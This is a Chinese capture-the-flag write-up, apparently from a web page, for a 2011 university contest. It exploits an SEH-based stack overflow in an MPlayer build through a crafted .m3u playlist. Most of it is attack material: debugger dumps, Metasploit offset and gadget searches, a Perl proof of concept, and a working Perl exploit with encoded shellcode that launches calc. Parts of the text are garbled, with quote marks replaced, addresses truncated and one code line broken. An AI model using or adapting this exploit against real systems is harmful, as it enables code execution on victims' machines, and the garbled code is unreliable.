70 30 47 70 31 47 70 32-47 70 33 47 70 34 47 70
p0Gp1Gp2Gp3Gp4Gp
63 74 78 20 00 00 00-01 00 00 00 b8 24 00 00
Actx &&..$..
c4 00 00 00 00 00 00 00-20 00 00 00 00 00 00 00
00 00 00 01 00 00 00-06 00 00 00 34 00 00 00
01 00 00 01 00 00 00-00 00 00 00 00 00 00 00
00 00 00 00 00 00 00-00 00 00 00 02 00 00 00
00 00 00 00 00 00 00-00 00 00 00 14 02 00 00
成功覆盖了seh。
现在我们来控制eip，定位下溢出点：
root@scan:~/Desktop# /opt/metasploit/apps/pro/msf3/tools/pattern_offset.rb 6f47366f
[*] Exact match at offset 5119
root@scan:~/Desktop# /opt/metasploit/apps/pro/msf3/tools/pattern_offset.rb 47356f47
[*] Exact match at offset 5115
溢出的基本流程应该是这样的:
\xeb\x06\x90\x90 & & &pop pop ret address
[&A& x 5115] [ nseh ] & & & & & [ seh ] & & & & & [ shellcode ]
shellcode貌似空间不太够，需要往回跳转了这次！
还好前面的字符串都是连续的没被破坏掉。
0:000& d 0022ffe0-400
33 46 67 34 46 67 35 46-67 36 46 67 37 46 67 38
3Fg4Fg5Fg6Fg7Fg8
46 67 39 46 68 30 46 68-31 46 68 32 46 68 33 46
Fg9Fh0Fh1Fh2Fh3F
34 46 68 35 46 68 36-46 68 37 46 68 38 46 68
h4Fh5Fh6Fh7Fh8Fh
46 69 30 46 69 31 46-69 32 46 69 33 46 69 34
9Fi0Fi1Fi2Fi3Fi4
69 35 46 69 36 46 69-37 46 69 38 46 69 39 46
Fi5Fi6Fi7Fi8Fi9F
a 30 46 6a 31 46 6a 32-46 6a 33 46 6a 34 46 6a
j0Fj1Fj2Fj3Fj4Fj
46 6a 36 46 6a 37 46-6a 38 46 6a 39 46 6b 30
5Fj6Fj7Fj8Fj9Fk0
6b 31 46 6b 32 46 6b-33 46 6b 34 46 6b 35 46
Fk1Fk2Fk3Fk4Fk5F
b 36 46 6b 37 46 6b 38-46 6b 39 46 6c 30 46 6c
k6Fk7Fk8Fk9Fl0Fl
46 6c 32 46 6c 33 46-6c 34 46 6c 35 46 6c 36
1Fl2Fl3Fl4Fl5Fl6
6c 37 46 6c 38 46 6c-39 46 6d 30 46 6d 31 46
Fl7Fl8Fl9Fm0Fm1F
d 32 46 6d 33 46 6d 34-46 6d 35 46 6d 36 46 6d
m2Fm3Fm4Fm5Fm6Fm
37 46 6d 38 46 6d 39 46-6e 30 46 6e 31 46 6e 32
7Fm8Fm9Fn0Fn1Fn2
46 6e 33 46 6e 34 46 6e-35 46 6e 36 46 6e 37 46
Fn3Fn4Fn5Fn6Fn7F
6e 38 46 6e 39 46 6f 30-46 6f 31 46 6f 32 46 6f
n8Fn9Fo0Fo1Fo2Fo
33 46 6f 34 46 6f 35 46-6f 36 46 6f 37 46 6f 38
3Fo4Fo5Fo6Fo7Fo8
46 6f 39 46 70 30 46 70-31 46 70 32 46 70 33 46
Fo9Fp0Fp1Fp2Fp3F
70 34 46 70 35 46 70 36-46 70 37 46 70 38 46 70
p4Fp5Fp6Fp7Fp8Fp
46 71 30 46 71 31 46-71 32 46 71 33 46 71 34
9Fq0Fq1Fq2Fq3Fq4
71 35 46 71 36 46 71-37 46 71 38 46 71 39 46
Fq5Fq6Fq7Fq8Fq9F
30 46 72 31 46 72 32-46 72 33 46 72 34 46 72
r0Fr1Fr2Fr3Fr4Fr
46 72 36 46 72 37 46-72 38 46 72 39 46 73 30
5Fr6Fr7Fr8Fr9Fs0
73 31 46 73 32 46 73-33 46 73 34 46 73 35 46
Fs1Fs2Fs3Fs4Fs5F
36 46 73 37 46 73 38-46 73 39 46 74 30 46 74
s6Fs7Fs8Fs9Ft0Ft
46 74 32 46 74 33 46-74 34 46 74 35 46 74 36
1Ft2Ft3Ft4Ft5Ft6
74 37 46 74 38 46 74-39 46 75 30 46 75 31 46
Ft7Ft8Ft9Fu0Fu1F
32 46 75 33 46 75 34-46 75 35 46 75 36 46 75
u2Fu3Fu4Fu5Fu6Fu
46 75 38 46 75 39 46-76 30 46 76 31 46 76 32
7Fu8Fu9Fv0Fv1Fv2
46 76 33 46 76 34 46 76-35 46 76 36 46 76 37 46
Fv3Fv4Fv5Fv6Fv7F
76 38 46 76 39 46 77 30-46 77 31 46 77 32 46 77
v8Fv9Fw0Fw1Fw2Fw
33 46 77 34 46 77 35 46-77 36 46 77 37 46 77 38
3Fw4Fw5Fw6Fw7Fw8
46 77 39 46 78 30 46 78-31 46 78 32 46 78 33 46
Fw9Fx0Fx1Fx2Fx3F
78 34 46 78 35 46 78 36-46 78 37 46 78 38 46 78
x4Fx5Fx6Fx7Fx8Fx
39 46 79 30 46 79 31 46-79 32 46 79 33 46 79 34
9Fy0Fy1Fy2Fy3Fy4
79 35 46 79 36 46 79-37 46 79 38 46 79 39 46
Fy5Fy6Fy7Fy8Fy9F
a 30 46 7a 31 46 7a 32-46 7a 33 46 7a 34 46 7a
z0Fz1Fz2Fz3Fz4Fz
46 7a 36 46 7a 37 46-7a 38 46 7a 39 47 61 30
5Fz6Fz7Fz8Fz9Ga0
61 31 47 61 32 47 61-33 47 61 34 47 61 35 47
Ga1Ga2Ga3Ga4Ga5G
36 47 61 37 47 61 38-47 61 39 47 62 30 47 62
a6Ga7Ga8Ga9Gb0Gb
47 62 32 47 62 33 47-62 34 47 62 35 47 62 36
1Gb2Gb3Gb4Gb5Gb6
62 37 47 62 38 47 62-39 47 63 30 47 63 31 47
Gb7Gb8Gb9Gc0Gc1G
32 47 63 33 47 63 34-47 63 35 47 63 36 47 63
c2Gc3Gc4Gc5Gc6Gc
47 63 38 47 63 39 47-64 30 47 64 31 47 64 32
7Gc8Gc9Gd0Gd1Gd2
64 33 47 64 34 47 64-35 47 64 36 47 64 37 47
Gd3Gd4Gd5Gd6Gd7G
64 38 47 64 39 47 65 30-47 65 31 47 65 32 47 65
d8Gd9Ge0Ge1Ge2Ge
33 47 65 34 47 65 35 47-65 36 47 65 37 47 65 38
3Ge4Ge5Ge6Ge7Ge8
47 65 39 47 66 30 47 66-31 47 66 32 47 66 33 47
Ge9Gf0Gf1Gf2Gf3G
66 34 47 66 35 47 66 36-47 66 37 47 66 38 47 66
f4Gf5Gf6Gf7Gf8Gf
39 47 67 30 47 67 31 47-67 32 47 67 33 47 67 34
9Gg0Gg1Gg2Gg3Gg4
47 67 35 47 67 36 47 67-37 47 67 38 47 67 39 47
Gg5Gg6Gg7Gg8Gg9G
30 47 68 31 47 68 32-47 68 33 47 68 34 47 68
h0Gh1Gh2Gh3Gh4Gh
47 68 36 47 68 37 47-68 38 47 68 39 47 69 30
5Gh6Gh7Gh8Gh9Gi0
69 31 47 69 32 47 69-33 47 69 34 47 69 35 47
Gi1Gi2Gi3Gi4Gi5G
36 47 69 37 47 69 38-47 69 39 47 6a 30 47 6a
i6Gi7Gi8Gi9Gj0Gj
47 6a 32 47 6a 33 47-6a 34 47 6a 35 47 6a 36
1Gj2Gj3Gj4Gj5Gj6
6a 37 47 6a 38 47 6a-39 47 6b 30 47 6b 31 47
Gj7Gj8Gj9Gk0Gk1G
b 32 47 6b 33 47 6b 34-47 6b 35 47 6b 36 47 6b
k2Gk3Gk4Gk5Gk6Gk
47 6b 38 47 6b 39 47-6c 30 47 6c 31 47 6c 32
7Gk8Gk9Gl0Gl1Gl2
6c 33 47 6c 34 47 6c-35 47 6c 36 47 6c 37 47
Gl3Gl4Gl5Gl6Gl7G
c 38 47 6c 39 47 6d 30-47 6d 31 47 6d 32 47 6d
l8Gl9Gm0Gm1Gm2Gm
33 47 6d 34 47 6d 35 47-6d 36 47 6d 37 47 6d 38
3Gm4Gm5Gm6Gm7Gm8
47 6d 39 47 6e 30 47 6e-31 47 6e 32 47 6e 33 47
Gm9Gn0Gn1Gn2Gn3G
6e 34 47 6e 35 47 6e 36-47 6e 37 47 6e 38 47 6e
n4Gn5Gn6Gn7Gn8Gn
39 47 6f 30 47 6f 31 47-6f 32 47 6f 33 47 6f 34
9Go0Go1Go2Go3Go4
47 6f 35 47 6f 36 47 6f-37 47 6f 38 47 6f 39 47
Go5Go6Go7Go8Go9G
70 30 47 70 31 47 70 32-47 70 33 47 70 34 47 70
p0Gp1Gp2Gp3Gp4Gp
现在先来构造一个简单的poc：
&\x90&P x 5115 + &\xeb\x06\x90\x90&P + [pop pop ret] + &\x90\x90\x90\xcc&
在程序的自身的dll中，没装od的插件就先不管safeseh的事情了。
Executable search path is:
ModLoad: b26000 & image
ModLoad: 7cc9b6000 & ntdll.dll
ModLoad: 7cc91d000 & C:\WINDOWS\system32\kernel32.dll
ModLoad: 6ade000 & C:\Documents and Settings\Administrator\桌面\xdcsc2011\xdcsc2011\漏洞挖掘\mplayer\mplayer_release\mplayer\aodec-52.dll
ModLoad: 00bd0000 00bfa000 & C:\Documents and Settings\Administrator\桌面\xdcsc2011\xdcsc2011\漏洞挖掘\mplayer\mplayer_release\mplayer\avutil-50.dll
ModLoad: 77be00 & C:\WINDOWS\system32\msvcrt.dll
ModLoad: 92000 & C:\Documents and Settings\Administrator\桌面\xdcsc2011\xdcsc2011\漏洞挖掘\mplayer\mplayer_release\mplayer\pthreadGC2.dll
ModLoad: 71ab000 & C:\WINDOWS\system32\WSOCK32.DLL
ModLoad: 71a00 & C:\WINDOWS\system32\WS2_32.dll
ModLoad: 71a00 & C:\WINDOWS\system32\WS2HELP.dll
ModLoad: 77da00 & C:\WINDOWS\system32\ADVAPI32.dll
ModLoad: 77e00 & C:\WINDOWS\system32\RPCRT4.dll
ModLoad: 77fc00 & C:\WINDOWS\system32\Secur32.dll
ModLoad: f6000 & C:\Documents and Settings\Administrator\桌面\xdcsc2011\xdcsc2011\漏洞挖掘\mplayer\mplayer_release\mplayer\avformat-52.dll
ModLoad: 6dd0b0000 & C:\Documents and Settings\Administrator\桌面\xdcsc2011\xdcsc2011\漏洞挖掘\mplayer\mplayer_release\mplayer\postproc-51.dll
ModLoad: 6dd7db000 & C:\Documents and Settings\Administrator\桌面\xdcsc2011\xdcsc2011\漏洞挖掘\mplayer\mplayer_release\mplayer\swscale-0.dll
ModLoad: 83000 & C:\WINDOWS\WinSxS\X86_mon-Controls_ccf1df_6.0._x-ww_d9c64cc6\COMCTL32.DLL
ModLoad: 77ef00 & C:\WINDOWS\system32\GDI32.dll
ModLoad: 77df000 & C:\WINDOWS\system32\USER32.dll
使用神器msfpescan找pop pop ret 的跳转地址
root@scan:~/Desktop# /opt/metasploit/app/msfpescan -p avcodec-52.dll
[avcodec-52.dll]
0x6ad410b4 ret
0x6ad42838 ret
0x6ad42a8 ret
0x6ad42c5 ret
0x6ad43304 ret
0x6ad4340 ret
0x6ad44d17 ret
0x6ad44e8 ret
0x6ad44 ret
0x6ad45048 ret
0x6ad45093 ret
0x6ad45128 ret
0x6ad453 ret
有了跳转地址我们就来写poc。
#!/usr/bin/perl
# 2011西安电子科技大学网络攻防大赛
漏洞挖掘题目 poc
# by c4rp3nt3r@0x50sec.org
my $junk = &\x90& x 5115;
my $nseh = &\xeb\x06\x90\x90&;
my $seh = pack('V',0x6ad410b4);
#pop pop ret from avcodec-52.dll
my $payload = &\x90\x90\x90\xcc& ;
open($FH,&&poc.m3u&);
print $FH $junk.$nseh.$seh.$payload.&\r\n&;
close($FH);
运行程序，把生成的&poc.m3u&托进程序发现poc成功运行。
ModLoad: 1d000
C:\WINDOWS\system32\IMM32.DLL
ModLoad: 62c00
C:\WINDOWS\system32\LPK.DLL
ModLoad: 73fa0
C:\WINDOWS\system32\USP10.dll
ModLoad: 35000
C:\Documents and Settings\Administrator\桌面\xdcsc2011\xdcsc2011\漏洞挖掘\mplayer\mplayer_release\mplayer\unrar.dll
ModLoad: cb000
C:\WINDOWS\system32\MSCTF.dll
ModLoad: 77bd00
C:\WINDOWS\system32\version.dll
ModLoad: 6e000
C:\WINDOWS\system32\msctfime.ime
ModLoad: 5adc0000 5adf7000
C:\WINDOWS\system32\uxtheme.dll
ModLoad: 5adc0000 5adf7000
C:\WINDOWS\system32\UxTheme.dll
(894.cec): Access violation & code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax= ebx=0022eab4 ecx=ffffffff edx= esi=7ffdfbf8 edi=
eip=7c921278 esp=0022e6ac ebp= iopl=0
nv up ei pl zr na pe nc
ntdll!RtlInitAnsiString+0x1b:
repne scas byte ptr es:[edi]
(894.cec): Break instruction exception & code
(first chance)
eax= ebx=7c9232a8 ecx=6ad410b4 edx=7c9232bc esi= edi=
eip=0022ffeb esp= ebp= iopl=0
nv up ei pl zr na pe nc
&Unloaded_eme.dll&+0x22ffea:
0022ffeb cc
0:000& d eip-4
6a 90 90 90 cc 31 00 00-00 00 00 00 00 00 00 00
00 40 11 40 00 00 00 00-00 41 63 74 78 20 00 00
.@.@&..Actx ..
01 00 00 00 b8 24 00-00 c4 00 00 00 00 00 00
20 00 00 00 00 00 00-00 14 00 00 00 01 00 00
06 00 00 00 34 00 00-00 14 01 00 00 01 00 00
00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
00 00 00 00 02 00 00-00 00 00 00 00 00 00 00
00 00 00 00 14 02 00-00 9c 01 00 00 00 00 00
0:000& d eip-40
90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90
90 90 90 90 90 eb 06 90-90 b4 10 d4 6a 90 90 90
cc 31 00 00 00 00 00 00-00 00 00 00 00 40 11 40
.1&&&..@.@
00 00 00 00 00 41 63 74-78 20 00 00 00 01 00 00
&..Actx &&
00 b8 24 00 00 c4 00 00-00 00 00 00 00 20 00 00
..$&&&. ..
00 00 00 00 00 14 00 00-00 01 00 00 00 06 00 00
好吧现在就写一个能够弹计算器的exploit,safeseh和dep就先不管了。dep用rop绕过就行了，又不是真的比赛这里就不玩了。
#!/usr/bin/perl
# 2011西安电子科技大学网络攻防大赛
漏洞挖掘题目 seh exploit
# by c4rp3nt3r@0x50sec.org
# /exec - 223 bytes
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
# CMD=calc
my $load =
&\xba\xa3\xfd\xdd\x88\xd9\xf7\xd9\x74\x24\xf4\x5f\x31\xc9& .
&\xb1\x32\x31\x57\x12\x83\xef\xfc\x03\xf4\xf3\x3f\x7d\x06& .
&\xe3\x49\x7e\xf6\xf4\x29\xf6\x13\xc5\x7b\x6c\x50\x74\x4c& .
&\xe6\x34\x75\x27\xaa\xac\x0e\x45\x63\xc3\xa7\xe0\x55\xea& .
&\x38\xc5\x59\xa0\xfb\x47\x26\xba\x2f\xa8\x17\x75\x22\xa9& .
&\x50\x6b\xcd\xfb\x09\xe0\x7c\xec\x3e\xb4\xbc\x0d\x91\xb3& .
&\xfd\x75\x94\x03\x89\xcf\x97\x53\x22\x5b\xdf\x4b\x48\x03& .
&\xc0\x6a\x9d\x57\x3c\x25\xaa\xac\xb6\xb4\x7a\xfd\x37\x87& .
&\x42\x52\x06\x28\x4f\xaa\x4e\x8e\xb0\xd9\xa4\xed\x4d\xda& .
&\x7e\x8c\x89\x6f\x63\x36\x59\xd7\x47\xc7\x8e\x8e\x0c\xcb& .
&\x7b\xc4\x4b\xcf\x7a\x09\xe0\xeb\xf7\xac\x27\x7a\x43\x8b& .
&\xe3\x27\x17\xb2\xb2\x8d\xf6\xcb\xa5\x69\xa6\x69\xad\x9b& .
&\xb3\x08\xec\xf1\x42\x98\x8a\xbc\x45\xa2\x94\xee\x2d\x93& .
&\x1f\x61\x29\x2c\xca\xc6\xc5\x66\x57\x6e\x4e\x2f\x0d\x33& .
&\x13\xd0\xfb\x77\x2a\x53\x0e\x07\xc9\x4b\x7b\x02\x95\xcb& .
&\x97\x7e\x86\xb9\x97\x2d\xa7\xeb\xfb\xb0\x3b\x77\xfc&;
$length = 5115 - length($load);
my $junk = &\x90& x $
my $nseh = &\xeb\x06\x90\x90&;
my $seh = pack('V',0x6ad410b4);
#pop pop ret from avcodec-52.dll
my $pay = &\xe9\x0c\xff\xff\xff& ; # jmp back to shellcode
open($FH,&&exp.m3u&);
print $FH $junk.$load.$nseh.$seh.$pay.&\r\n&;
close($FH);
打开构造的exp.m3u会弹出期待的计算器。
(window.slotbydup=window.slotbydup || []).push({
id: '2467140',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467141',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467143',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467148',
container: s,
size: '1000,90',
display: 'inlay-fix'

EZ5ez5烧录卡内核下载升级问题

参考资料

随机推荐